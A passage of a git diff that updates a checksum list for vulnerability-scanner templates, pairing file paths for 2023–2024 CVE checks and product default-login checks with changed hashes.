-http/cves/2023/CVE-2023-45852.yaml:d39ba1794537aef42102e2fe48b365b78741b23d -http/cves/2023/CVE-2023-45855.yaml:eaddbc4fb0b7eead9adf6cb0494bf36881f0efb8 -http/cves/2023/CVE-2023-4596.yaml:603ccaf7c6a43f545e74a1815e654f5574afa94d +http/cves/2023/CVE-2023-45671.yaml:becf81815d0a74439b7a0f23ac3be9d02e127ac3 +http/cves/2023/CVE-2023-4568.yaml:c187b28f767b107a824bc68a1c0810a957a16a3d +http/cves/2023/CVE-2023-45852.yaml:29a13005cad157b33728bac40e7096376c822280 +http/cves/2023/CVE-2023-45855.yaml:376f8b9d3901193f3de5f1841da162b4dd693ec7 +http/cves/2023/CVE-2023-4596.yaml:dff8818a076c4e5fad0e3e189edb9c0a00003d4a http/cves/2023/CVE-2023-4634.yaml:25ca2cd6e1903db0a7bc4d306856e30d2b98f8fc -http/cves/2023/CVE-2023-46347.yaml:f06e431965103c65099bb522dd1a07a5c5c29490 -http/cves/2023/CVE-2023-46359.yaml:41e3418ce4b1f2cb19045d7711bb09cdcf85d906 -http/cves/2023/CVE-2023-46574.yaml:5693104f4f9e4ef10d187f3db1677b14ac0e01a7 -http/cves/2023/CVE-2023-46747.yaml:d15410bfd07abd35959131c7401f6c0274ff43b8 +http/cves/2023/CVE-2023-46347.yaml:f8aaf0e2faa39f28d7f1f9d33c7b171d9ad38340 +http/cves/2023/CVE-2023-46359.yaml:83426962f0f9937b49f713603c55628d16552b16 +http/cves/2023/CVE-2023-46574.yaml:174ebe98cec3e58cd5233927899da721b1003e0c +http/cves/2023/CVE-2023-46747.yaml:8034386aab766649cefb93c12ae6cd42ae1b09d9 http/cves/2023/CVE-2023-46805.yaml:1b2422c71b91214c98e03d968a0f8bc7db02914b http/cves/2023/CVE-2023-47115.yaml:f5f0d4869bc075f448f560f87f29febd4cc63497 http/cves/2023/CVE-2023-4714.yaml:ded522e184551747912d5a2c70df1be0bb4cc545 -http/cves/2023/CVE-2023-47211.yaml:6e94b6fc875e2b5825f2bb2f6cdd944c4120ec6f +http/cves/2023/CVE-2023-47211.yaml:57a479e903db82adc0b54fced6f541a6fe9a7961 http/cves/2023/CVE-2023-47218.yaml:ba61fc9e686e0c5f28048e666320fccb7bef32aa -http/cves/2023/CVE-2023-47246.yaml:6284694374446f3dad6d6d19199eef9716fedce8 -http/cves/2023/CVE-2023-47643.yaml:930c8146dc661112f8f6813377b474cc8ef4af43 -http/cves/2023/CVE-2023-48023.yaml:697087ed9d6a9a5d6ddb11ac6bbcc476af250fda -http/cves/2023/CVE-2023-48084.yaml:f94375b7b04cd7068a194de7bef08031e49b8ec9 -http/cves/2023/CVE-2023-48777.yaml:a83222021b8b880d20e37f86385eefd707ea58a6 -http/cves/2023/CVE-2023-49070.yaml:d06065b05629420013472d48c582cbe5e961acca -http/cves/2023/CVE-2023-49103.yaml:ee6296775282d45749ed9696b95f65ef7e7fb409 -http/cves/2023/CVE-2023-4966.yaml:d391f17d820a58050a92f2bf705c954fadfc33d6 -http/cves/2023/CVE-2023-4973.yaml:ade0057226a18eefca978599bcc7536828e2b0ba -http/cves/2023/CVE-2023-4974.yaml:065f5e7ac20a53380a674788a3f2962757d556f5 +http/cves/2023/CVE-2023-47246.yaml:6cbc4ea372ee4b2b9bd59c9d7a88933946d4eb45 +http/cves/2023/CVE-2023-47643.yaml:843ad477f4c0847367fb5b5ea156ebba57372f93 +http/cves/2023/CVE-2023-48023.yaml:45c9fed1d64556214b74e1de1852e6a6995bacbe +http/cves/2023/CVE-2023-48084.yaml:6714252dc89c27ea7cda0484f6e45f5c21849ca8 +http/cves/2023/CVE-2023-48777.yaml:52b0e3e7eb3ed22f9d0d68114053dd9ea87677d6 +http/cves/2023/CVE-2023-49070.yaml:26d50632afda5fb2ae8260a5e386064f3e2d581c +http/cves/2023/CVE-2023-49103.yaml:1a61e2197a90af44caca1e85ca6489698e09accc +http/cves/2023/CVE-2023-4966.yaml:999c79592f279249903afb708578aae27977c3f9 +http/cves/2023/CVE-2023-4973.yaml:b7b931156c9b2e8a81daf5e524200b61a83d8bdf +http/cves/2023/CVE-2023-4974.yaml:903173457ec36bc7a21422fa82994faba8b2dbe1 http/cves/2023/CVE-2023-49785.yaml:97699a3c262cb416153932623d07c232dc350da0 -http/cves/2023/CVE-2023-5003.yaml:8ee343116f222de42948949e5ffd260ff7f651f6 -http/cves/2023/CVE-2023-50290.yaml:3bf7844e47af925c9bb7e46c3765099ebcc62a37 -http/cves/2023/CVE-2023-5074.yaml:333898fb41033b86f19a1b7ef66c883abf0dc603 -http/cves/2023/CVE-2023-5089.yaml:2adf5e270a9a8d3e62f38f80d15c81ff6f73c86c -http/cves/2023/CVE-2023-50917.yaml:8485c56545fb01ececff61d1b187e86cf10359ff -http/cves/2023/CVE-2023-50968.yaml:d701b9d9beed14eb605f246a8385d5ae63549044 -http/cves/2023/CVE-2023-51467.yaml:8e576c733e78323aedf0aba8db9f668cf92c2165 -http/cves/2023/CVE-2023-52085.yaml:1c4308ded46381ed085ad4734d3f8589b3b41e32 -http/cves/2023/CVE-2023-5244.yaml:597ba45149281f648c68ff143dc31b0e76374daa +http/cves/2023/CVE-2023-5003.yaml:4f800fa6ab1df2267322e0b1527e8c7a09829769 +http/cves/2023/CVE-2023-50290.yaml:33c022c45e47628e6c1f7865bd10b4dc28c4e37b +http/cves/2023/CVE-2023-5074.yaml:0bee1e0b2d77d0ffbbbf8cc00d53acb4979ae28f +http/cves/2023/CVE-2023-5089.yaml:c51f608a3a99b7a7ea1a90f49badde7d12cf1e6f +http/cves/2023/CVE-2023-50917.yaml:f0cb72641b1188fc2f7a615137512a1b956eeeba +http/cves/2023/CVE-2023-50968.yaml:ba55dd8cde0223755e58c18a48ae9e7a5407aa62 +http/cves/2023/CVE-2023-51467.yaml:ca66217bafda2b96c5c17cad532af4bee418699d +http/cves/2023/CVE-2023-52085.yaml:8b9252b4ee0f19700fdbf7777b1865551167c2d8 +http/cves/2023/CVE-2023-5244.yaml:e8676ea3fe8f5fdbf6a62de0894078ce7445b00d http/cves/2023/CVE-2023-5360.yaml:1914270d0878333c4f7605b7686f1c0ad1c009f8 http/cves/2023/CVE-2023-5375.yaml:c2c3a1f499a12f579dd2808bc0f40ed32cef2ecc http/cves/2023/CVE-2023-5556.yaml:d4312b384f0e855174b1ac442795700fc93c8bbf -http/cves/2023/CVE-2023-5830.yaml:2f8a57cf5b24a79ddb3beb3a1b7afb5b7f46ec1f -http/cves/2023/CVE-2023-5914.yaml:a86ac76b1ff712183218ce7828a44b2322ac6691 -http/cves/2023/CVE-2023-5991.yaml:2b58ad837e4ef570c331764533e0537d299134c3 -http/cves/2023/CVE-2023-6018.yaml:6e786051da470cff47db25c70cae932d2d11c5b4 -http/cves/2023/CVE-2023-6020.yaml:2e5a46f2b86f9571e16bef30f788c23371873483 -http/cves/2023/CVE-2023-6021.yaml:0b6c229e8f98e96f337526d324b835b089b35e05 -http/cves/2023/CVE-2023-6023.yaml:2e1e8047589f80145773005880924fb1630cedd3 -http/cves/2023/CVE-2023-6038.yaml:ec35d80f5e18691465abba091626dc0269bb94e3 -http/cves/2023/CVE-2023-6063.yaml:ce9b1337d54661d00ecde7ce71f9af7c6424b482 -http/cves/2023/CVE-2023-6065.yaml:3b7d1265356ff18ee004967d92bb0526b49508eb -http/cves/2023/CVE-2023-6114.yaml:5f72629ff4c06f75a7934d33fc0e9560e41e4aa7 -http/cves/2023/CVE-2023-6360.yaml:f551bf7a216058f7e21fc611f07a64f13936bcc3 -http/cves/2023/CVE-2023-6379.yaml:fea4f85b8a06d983baccc0a46c3bf06428b00f66 -http/cves/2023/CVE-2023-6380.yaml:9cf66bb792a23fb8d60cde7efc9297bd34dd4e3f -http/cves/2023/CVE-2023-6389.yaml:aa2ca6dd124ab01108332d25d50795974c8966ff -http/cves/2023/CVE-2023-6553.yaml:c39cbdf2fd1401566278a9c67acfd778cc7e0a33 -http/cves/2023/CVE-2023-6567.yaml:cdce1a98c1e388ed8654fbba85a84206aa3fd060 -http/cves/2023/CVE-2023-6623.yaml:381dfb438bdd789de214cbe9b297e0d21426dd8e -http/cves/2023/CVE-2023-6634.yaml:c45be4fd51bc88b85bef9da0576508f125e771c4 -http/cves/2023/CVE-2023-6831.yaml:5995ef975cd70e924dee68190168106f60042687 -http/cves/2023/CVE-2023-6875.yaml:8b565894b3e019b7cb5f830b959b4726b5266111 +http/cves/2023/CVE-2023-5830.yaml:afc144e3656fc63ce80d0a5bd6c2d2c47c896f54 +http/cves/2023/CVE-2023-5914.yaml:5d016a1ac36e3f0972c537417bfc00cdf5b05036 +http/cves/2023/CVE-2023-5991.yaml:80faa4b55c8feada53490a93f4dc54be370d4bff +http/cves/2023/CVE-2023-6018.yaml:62234e9a960600af152c1e4ea11fc33078158a96 +http/cves/2023/CVE-2023-6020.yaml:961d2933606184b0f24ae6e109589cb6fb5c371b +http/cves/2023/CVE-2023-6021.yaml:4d60e98e6464e48f30bfd80a2879c5025b8115b8 +http/cves/2023/CVE-2023-6023.yaml:894eda6ad30f9cb75bae9865b552b3d9e1439944 +http/cves/2023/CVE-2023-6038.yaml:d0598518a34e87b3df39a996dbc2969ae576fad0 +http/cves/2023/CVE-2023-6063.yaml:d1e516058338f612347dba91ed13fc5406cb4d7f +http/cves/2023/CVE-2023-6065.yaml:9d402d2854231906a58b7fa10219cd189c5c6918 +http/cves/2023/CVE-2023-6114.yaml:65353fb14406628586fb741a32c1bf7ec36c46e2 +http/cves/2023/CVE-2023-6360.yaml:4dc28d57d894063fd6a67edf0e29ea2380fad9be +http/cves/2023/CVE-2023-6379.yaml:9f2ebeef8f2c8d3a3fb9c0e8b49cc3c0c132082d +http/cves/2023/CVE-2023-6380.yaml:f4d215b24e29caa45bee7186a98523bad5c7e231 +http/cves/2023/CVE-2023-6389.yaml:1442104ed12f70cbab2bdea5effa6e4262a9b95f +http/cves/2023/CVE-2023-6553.yaml:7a54271ce0dabed297718787b829f3ddc52b256c +http/cves/2023/CVE-2023-6567.yaml:36ddd59d4deab3cab1f59f9bcd8a5e8ddb07d6c0 +http/cves/2023/CVE-2023-6623.yaml:00d70a24f04c9124d433cb202bbe6d5feac8db68 +http/cves/2023/CVE-2023-6634.yaml:7d6b2f13c31512686f5c947bca522a303557ab7b +http/cves/2023/CVE-2023-6831.yaml:ad8d1c5d09d06e040adb1ca000940c67d637d467 +http/cves/2023/CVE-2023-6875.yaml:5c19bc2790c31711d03df8e4a0aa770f203bade4 http/cves/2023/CVE-2023-6895.yaml:50fd3c56376c3c233216803d769fd1a705fc052c -http/cves/2023/CVE-2023-6909.yaml:ea03a39bc9ec9a5d71dce0b19a6ef34b7ca7e677 -http/cves/2023/CVE-2023-6977.yaml:c98a9d3b0945e2796860a783e5792fd2076a2635 -http/cves/2023/CVE-2023-6989.yaml:ef6879d5fdb558ba1011a99b330bf370b91cecd6 -http/cves/2023/CVE-2023-7028.yaml:55feb15373ca1189a1fbf3798104d3d856072a61 -http/cves/2024/CVE-2024-0195.yaml:853d9c6bdb1557e237392253d6e9f31e46a3148b -http/cves/2024/CVE-2024-0200.yaml:db3db17f0e89a1431f267c606358e332a99c03de -http/cves/2024/CVE-2024-0204.yaml:1fae46e1cd227466c3c3feaf80a3138de83202d7 -http/cves/2024/CVE-2024-0235.yaml:c69e7d5bb5af115d21e8637b6c284b3cef728f3d -http/cves/2024/CVE-2024-0305.yaml:f41f0078cdcfbc8f314bafadaf75f66f1b3b7318 +http/cves/2023/CVE-2023-6909.yaml:49445ba4c9f3657098a5b90e0139e370ad4b0e22 +http/cves/2023/CVE-2023-6977.yaml:92c599645f0079a1292d86ff4c56dddc787b5818 +http/cves/2023/CVE-2023-6989.yaml:f42110a36f2bf7b8c62a72a752a69c8db52480c5 +http/cves/2023/CVE-2023-7028.yaml:0ce7fc4083aa99ba9c914582ed064b84b50d22a2 +http/cves/2024/CVE-2024-0195.yaml:091e10588a00fadab2e1e67d7ce5f8d286e7d3d2 +http/cves/2024/CVE-2024-0200.yaml:aaa2f2a6703a042cdff54922d03d08e7f649a3ad +http/cves/2024/CVE-2024-0204.yaml:a5dd990f0b300285f5d71eb7300852fc580c358a +http/cves/2024/CVE-2024-0235.yaml:662cd334f1c4420211126b256e502026c87670f2 +http/cves/2024/CVE-2024-0305.yaml:066fc036c2ea567923f4983ccfcc447009354020 http/cves/2024/CVE-2024-0337.yaml:4a573bdaf757a5eca3d9892d080c0ccc038119d7 http/cves/2024/CVE-2024-0352.yaml:f2f46e8a92d48c008e17233656b4941b3fc4c874 -http/cves/2024/CVE-2024-0713.yaml:e18c2f9242ea9c4bf6c74628267441b984c92439 +http/cves/2024/CVE-2024-0713.yaml:b8ebbe918246b345ca0ec9041ff7b1edea36dda0 http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437 -http/cves/2024/CVE-2024-1021.yaml:d051c28678ddf7ab106a7380a9c8b1add058089f -http/cves/2024/CVE-2024-1061.yaml:c7581b37598881c648b19efc0faf21d6d2a0d942 -http/cves/2024/CVE-2024-1071.yaml:0f1f2cd742123216a64316396de055a5d69ab2c6 -http/cves/2024/CVE-2024-1183.yaml:312273b8447e8ecf23d1a19d0a502e8c68b4ee9f -http/cves/2024/CVE-2024-1208.yaml:d00305fb5949ba4044bfef97f71e5b5421596414 -http/cves/2024/CVE-2024-1209.yaml:ca30f5ace1cb3cc4f87869d139c8b1437f5929c3 +http/cves/2024/CVE-2024-1021.yaml:c9be400622968f5464c3aed476c4719ddef81b52 +http/cves/2024/CVE-2024-1061.yaml:96c95b4ca9238cb7c10740394d456ebb9259be24 +http/cves/2024/CVE-2024-1071.yaml:c96b9ae1af3c57ad1d76138972e4ef609468f43c +http/cves/2024/CVE-2024-1183.yaml:ffe0544f2ff472a9588380611602503fcd73e340 +http/cves/2024/CVE-2024-1208.yaml:080cd48093b2902e76b14bdeddd38bbba9bc18a9 +http/cves/2024/CVE-2024-1209.yaml:2951e4131bf7866fb91570a8d7d12ecd316a68da http/cves/2024/CVE-2024-1210.yaml:7af2bde109e8f0dbb0af5f22cdbcfd5e2c0cc132 -http/cves/2024/CVE-2024-1212.yaml:900bf5a48a355264fc661b1bde6698301d4d74b5 +http/cves/2024/CVE-2024-1212.yaml:6b1a4784714777f96940e0a8ee7a02b8f92922a4 http/cves/2024/CVE-2024-1380.yaml:20b25b6bb316198f59ab5b21284278df2eeb480f http/cves/2024/CVE-2024-1561.yaml:659c9112fbbf202496c98637b8ffcfd2665024ab http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 -http/cves/2024/CVE-2024-1709.yaml:102af214d4495a68e74bb891c2773bead94590b9 +http/cves/2024/CVE-2024-1709.yaml:fbffa10f3832defdae69499878e00010a44c1b0a http/cves/2024/CVE-2024-20767.yaml:241fd099c8ac13ce65b6bc56f755be96783242a2 -http/cves/2024/CVE-2024-21644.yaml:c4ef96cc8efd3d2688c65e91654e0e47214f6bad -http/cves/2024/CVE-2024-21645.yaml:85d1af5d6112eefd89dd13a1fb1b127e46bf5025 -http/cves/2024/CVE-2024-21683.yaml:cf57cefd1dfcb83eddaee02631235d1f4cd0e3f5 -http/cves/2024/CVE-2024-21887.yaml:ea90173fd68f86d7fadd65f9e7f92b96bb702fc7 -http/cves/2024/CVE-2024-21893.yaml:e4d30c086d3cce0f7d335d07cd3880e08008cace -http/cves/2024/CVE-2024-22024.yaml:b30e59d8d609c95c683e30814eccf7a4947fe4d5 -http/cves/2024/CVE-2024-22319.yaml:4cbfc5a519aedfc5797a55f1d9e987878ea1affa -http/cves/2024/CVE-2024-22320.yaml:8d803ff557285de94979ed92b6631bf6a0c702b3 -http/cves/2024/CVE-2024-22927.yaml:adfd631dfe9e98aca8497b0e83e8d9d250bece6d +http/cves/2024/CVE-2024-21644.yaml:48021ee39de24e3ea1ef7e900a5a28ebed70f411 +http/cves/2024/CVE-2024-21645.yaml:0b8856904f2d109744123490861e51f34afcff6b +http/cves/2024/CVE-2024-21683.yaml:043bd906b34a9c1e389305c6bf54e415a83ce24b +http/cves/2024/CVE-2024-21887.yaml:909d11e3661377887b920f5c43436e2d685c34ca +http/cves/2024/CVE-2024-21893.yaml:a791d8f44ac8b7e7aee47af58c8e8808e625982b +http/cves/2024/CVE-2024-22024.yaml:916d18693874403ab8b2a0b781d8bf45a9ea2137 +http/cves/2024/CVE-2024-22319.yaml:e1284223bcc36696fda3cc63065302a4650c227d +http/cves/2024/CVE-2024-22320.yaml:ad6b1653488c3e9ea8fc758d98c75a6c1c54c076 +http/cves/2024/CVE-2024-22927.yaml:3a251aad259433eed60185c8cebe1cfae50825a8 http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe http/cves/2024/CVE-2024-2340.yaml:2b0b9e95cf442c8b162d18c5d337c05baac60b18 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 -http/cves/2024/CVE-2024-23917.yaml:a125724840c62f5a0883845b29c45260cf9e5db0 -http/cves/2024/CVE-2024-24131.yaml:fc220892f672bbd646e7d59dd36a87b558384a5e +http/cves/2024/CVE-2024-23917.yaml:51738979be19460f2365f47d3eb2eac50d627cb2 +http/cves/2024/CVE-2024-24131.yaml:c54d93f7316eb7bfd899c9f03f8a693942e9ec9c http/cves/2024/CVE-2024-24919.yaml:32ba8338c24aa5d9b6bc4780c00087a850faabe8 http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 -http/cves/2024/CVE-2024-25669.yaml:0bd3ad0e9810f1534fe33874b3d394be149c9c4a -http/cves/2024/CVE-2024-25735.yaml:ab6082a5398e304b6eb1d81781ca3b0696911a8a -http/cves/2024/CVE-2024-26331.yaml:3d55661a57ed97ee450fbcc6e7d65258201b4eb6 -http/cves/2024/CVE-2024-27198.yaml:e6c43366ad88322747338defddbc5e9f0b41cff7 +http/cves/2024/CVE-2024-25669.yaml:859ce6829af85dcbbc97aff746be54b6ab8d4d23 +http/cves/2024/CVE-2024-25735.yaml:62e4fcd344865c267789835cfbc7bd1677e002d3 +http/cves/2024/CVE-2024-26331.yaml:1f13e279312f16452413eae02b0cb32971d720f8 +http/cves/2024/CVE-2024-27198.yaml:428b5bbb2a88c48db434e13c0fdc3dea195f4a6f http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d http/cves/2024/CVE-2024-27348.yaml:6af6e5ad3b0eae4fa48d1937d51d5a5b767395b5 -http/cves/2024/CVE-2024-27497.yaml:8184b8144cb37b59f55167efd79fbdb718b771f7 -http/cves/2024/CVE-2024-27564.yaml:2d7cd805376bddeea95532fe6833cb3d4a2f7ff4 +http/cves/2024/CVE-2024-27497.yaml:b898a9ccd9f6528a3d1ad4b1b9660b12752104e1 +http/cves/2024/CVE-2024-27564.yaml:0b9367bff756ebc5d7db5a742305272ac13f37b1 http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43 http/cves/2024/CVE-2024-27956.yaml:b6cecd7a2c5dd148c961bcacc9d6bc9075c9b90c http/cves/2024/CVE-2024-28255.yaml:d7b149c542f2dba2d719e547ddc497ad029532e8 http/cves/2024/CVE-2024-28734.yaml:282a40ba7cd7f653bfbc9f16397b9c6115ca18b1 http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b http/cves/2024/CVE-2024-2879.yaml:c2ce4ab84a2eac56ef529eeba7a3749e0394cd43 -http/cves/2024/CVE-2024-29059.yaml:40c3c60a5ebd44c5060613c2aedf947d25fa38a9 +http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 -http/cves/2024/CVE-2024-3097.yaml:4fdafc24ac5001b7685fc40aee096450dee38ddc +http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9 http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2 -http/cves/2024/CVE-2024-31621.yaml:24117c9ab9f95116bb4cdbdd1102c251d2f5d14f -http/cves/2024/CVE-2024-31848.yaml:2ae880277f0c2a88e232abb5b987e4c6e40940bf -http/cves/2024/CVE-2024-31849.yaml:a4b3067e6a7bfb3168a4db0bdc6c51c986adf08b -http/cves/2024/CVE-2024-31850.yaml:8fcc758e6f7344016342d2ed9f4977b493a6bdd3 -http/cves/2024/CVE-2024-31851.yaml:1176cabeef0f6f79d2d8c40b33c3e2ab50c1405b +http/cves/2024/CVE-2024-31621.yaml:53f009e716d10910d474a4dec892fefd6524efae +http/cves/2024/CVE-2024-31848.yaml:7897724f33b3fb2247e15f6c2904421c54586c6c +http/cves/2024/CVE-2024-31849.yaml:3959023f6bd03c1ab24b2e711acd4683c98d8dbe +http/cves/2024/CVE-2024-31850.yaml:577eb6159f7a5fa2fa929980f842306c674bf2ca +http/cves/2024/CVE-2024-31851.yaml:c68bf4f7214f9abb654a5bb11cd9088cdb1fe690 http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5 -http/cves/2024/CVE-2024-32640.yaml:5823b03fab54f2919f661639c4fd761ccc35d2e5 -http/cves/2024/CVE-2024-32651.yaml:b86dd95c3247a2f798ffd14dac8bdf95ce9e7e70 -http/cves/2024/CVE-2024-3273.yaml:93a1a60547b4c6b918fa02cd8c3a0d9d0b758835 +http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74 +http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c +http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00 http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab -http/cves/2024/CVE-2024-33575.yaml:1e90c73e7fb583bb1ff28b4b322eaa5c006f3b62 -http/cves/2024/CVE-2024-33724.yaml:76df3a28985980cc0751d3e11c46d90ff640bb4d -http/cves/2024/CVE-2024-3400.yaml:37f1b4af464c36e8cf38b56c05f0bd2b4870c810 -http/cves/2024/CVE-2024-34470.yaml:874af56b325acd3274264aa15900d58301eb4286 +http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962 +http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc +http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 +http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 -http/cves/2024/CVE-2024-3822.yaml:fc038c91b44d50e8c94eaae1fc8ec57990f09419 -http/cves/2024/CVE-2024-4040.yaml:12a289f25fe2eed39f2d10e0acc42f072f33a6c8 -http/cves/2024/CVE-2024-4348.yaml:0c8cb2b8d92cd6efe70b6501e2c1a8efd764de03 -http/cves/2024/CVE-2024-4358.yaml:56a00c719f78cfb208b48d94745ba8e1dcbaac39 -http/cves/2024/CVE-2024-4956.yaml:8a5cd465ace7b7ea128a005b07edb831b4384aa6 +http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c +http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 +http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 +http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 +http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c -http/default-logins/3com/3Com-wireless-default-login.yaml:3873c626c80c5a5e86d5dfed92403e7984c92a22 +http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c @@ -3336,7 +3336,7 @@ http/default-logins/alibaba/canal-default-login.yaml:53bee91e5473ba3be493bdb74fc http/default-logins/allnet/allnet-default-login.yaml:bdc1b0fae7b08909a071f9b452800f8b37b4b2ea http/default-logins/alphaweb/alphaweb-default-login.yaml:c70e96a6e9ed34b5fe721cc25c004aa4c66a59c9 http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7369f02f4a8cfe -http/default-logins/ampjuke-default-login.yaml:96b17a8f185a7fd318fa05f100e39c995df66815 +http/default-logins/ampjuke-default-login.yaml:80f58e7f436f698938228565a8b02626e5c287ca http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b http/default-logins/apache/apisix-default-login.yaml:88d0d5d11425c2cadb204d0afb7b26d8df4376fe http/default-logins/apache/dolphinscheduler-default-login.yaml:1e4031c994ea6c6aa571dad9a5e7ccbf908e2251 @@ -3349,22 +3349,22 @@ http/default-logins/apache/tomcat-default-login.yaml:a057ed0e19a54a1c131347568ad http/default-logins/apache/tomcat-examples-login.yaml:a9fc4069a07f30642160b89c1b2fd791fef60d48 http/default-logins/apollo/apollo-default-login.yaml:d1616da4d6f3aed8f63bdf7eaed893ced48f8c2d http/default-logins/arl/arl-default-login.yaml:6397a0cc463fb34e61c64f77018ae1b08a3738fe -http/default-logins/asus/asus-rtn16-default-login.yaml:c1ec71b690a66abb90cf23e630a7e9832e4cff46 -http/default-logins/asus/asus-wl500g-default-login.yaml:bea4c96619b92dc52336af108a7fc5cda2a5f9e4 -http/default-logins/asus/asus-wl520GU-default-login.yaml:a58962befcd518f0a14bce9b092453cf0d5ec675 +http/default-logins/asus/asus-rtn16-default-login.yaml:b4ff21270402db6e99630d011053d5a399ae2c6f +http/default-logins/asus/asus-wl500g-default-login.yaml:ef9c61305287f705f2cb62519223150e01b13a41 +http/default-logins/asus/asus-wl520GU-default-login.yaml:ab10d5f8d00e1e69b1fafc0d9443af3498bbc1a1 http/default-logins/audiocodes/audiocodes-default-login.yaml:46660eeb6fae382ddf01771604dd52774904bade http/default-logins/azkaban/azkaban-default-login.yaml:fd08250d7e9178eaeb7c0d8f8df828e113598d7f http/default-logins/barco-clickshare-default-login.yaml:cac1f9f84f536daf4f7d3b21a9dda47d9d538214 http/default-logins/batflat/batflat-default-login.yaml:983b4bc3ea5162cd92de42686894cfde4482ca8d http/default-logins/bloofoxcms-default-login.yaml:521262f1b70cf41dabf50e7022c8d6874ad6f472 http/default-logins/caimore/caimore-default-login.yaml:fa6dc9fbfefd35cbe6b0122cbe2063f51286d122 -http/default-logins/cambium-networks/cambium-networks-default-login.yaml:4364696c74e926e0ff950343d9fd023a9d7c776a +http/default-logins/cambium-networks/cambium-networks-default-login.yaml:928052d49de95f8d8b897803364418aca8270c23 http/default-logins/camunda/camunda-default-login.yaml:e0ba275d0aeadc4a4e0df5010277d2db9e6329e7 http/default-logins/chinaunicom/chinaunicom-default-login.yaml:825cceb7abec9ba21938e316e8748da23c72c82a http/default-logins/cobbler/cobbler-default-login.yaml:2994d59f748f3b084644bb25989f6ecc8ea81a2a http/default-logins/cobbler/hue-default-credential.yaml:810629da57236ea925fc51305d98564392a5b017 -http/default-logins/crushftp/crushftp-anonymous-login.yaml:ed1021e3d89624d02488951a27b653e8ae9b48cd -http/default-logins/crushftp/crushftp-default-login.yaml:af0406f795cbe0409eb6334f5f9bfc385089a190 +http/default-logins/crushftp/crushftp-anonymous-login.yaml:cb77354d294daa1e224571b03045b9767bae19e4 +http/default-logins/crushftp/crushftp-default-login.yaml:75474e734fce9973911f47d0021066a4ae07c5c7 http/default-logins/d-link/dlink-centralized-default-login.yaml:144088e9a738b069bd642d60d64993447e44f264 http/default-logins/dataease/dataease-default-login.yaml:b0bd13ca24f63ec494c00e52233168059a5c0b75 http/default-logins/datahub/datahub-metadata-default-login.yaml:75c046c42ef30be2401e7d782f6933e71084bfab @@ -3373,7 +3373,7 @@ http/default-logins/dell/dell-dpi-default-login.yaml:c8dabcfcdb39d6a22dd877512d2 http/default-logins/dell/dell-idrac-default-login.yaml:1dc3a2376aeb7ca1b68b49de2fb293c5d3f988d5 http/default-logins/dell/dell-idrac9-default-login.yaml:ff8233327b0de4c8fad6255f51c14ec0771fb8de http/default-logins/dell/emcecom-default-login.yaml:67e9a911b490370e01545f18a1ed6adbb5333fb8 -http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml:73cad2502bfc11185fad1a2819627868c3a9faa6 +http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml:757e37421ad654500aeb166c26016e839e77f176 http/default-logins/digitalrebar/digitalrebar-default-login.yaml:87a2a0df776e6ceab4b3a02845b43bf93f6d3ada http/default-logins/druid/druid-default-login.yaml:cdf960a64c7f527a149b2a1b5cf62b7d40c4aeee http/default-logins/dvwa/dvwa-default-login.yaml:0803d0330a8ea7cbd071f03e54c1ea65d415ee76 @@ -3431,7 +3431,7 @@ http/default-logins/nacos/nacos-default-login.yaml:489f794fa8d86511bf97ce5b2b9f9 http/default-logins/nagios/nagios-default-login.yaml:5be447e727ec6ec2763d2ffb167419587ceb9bc9 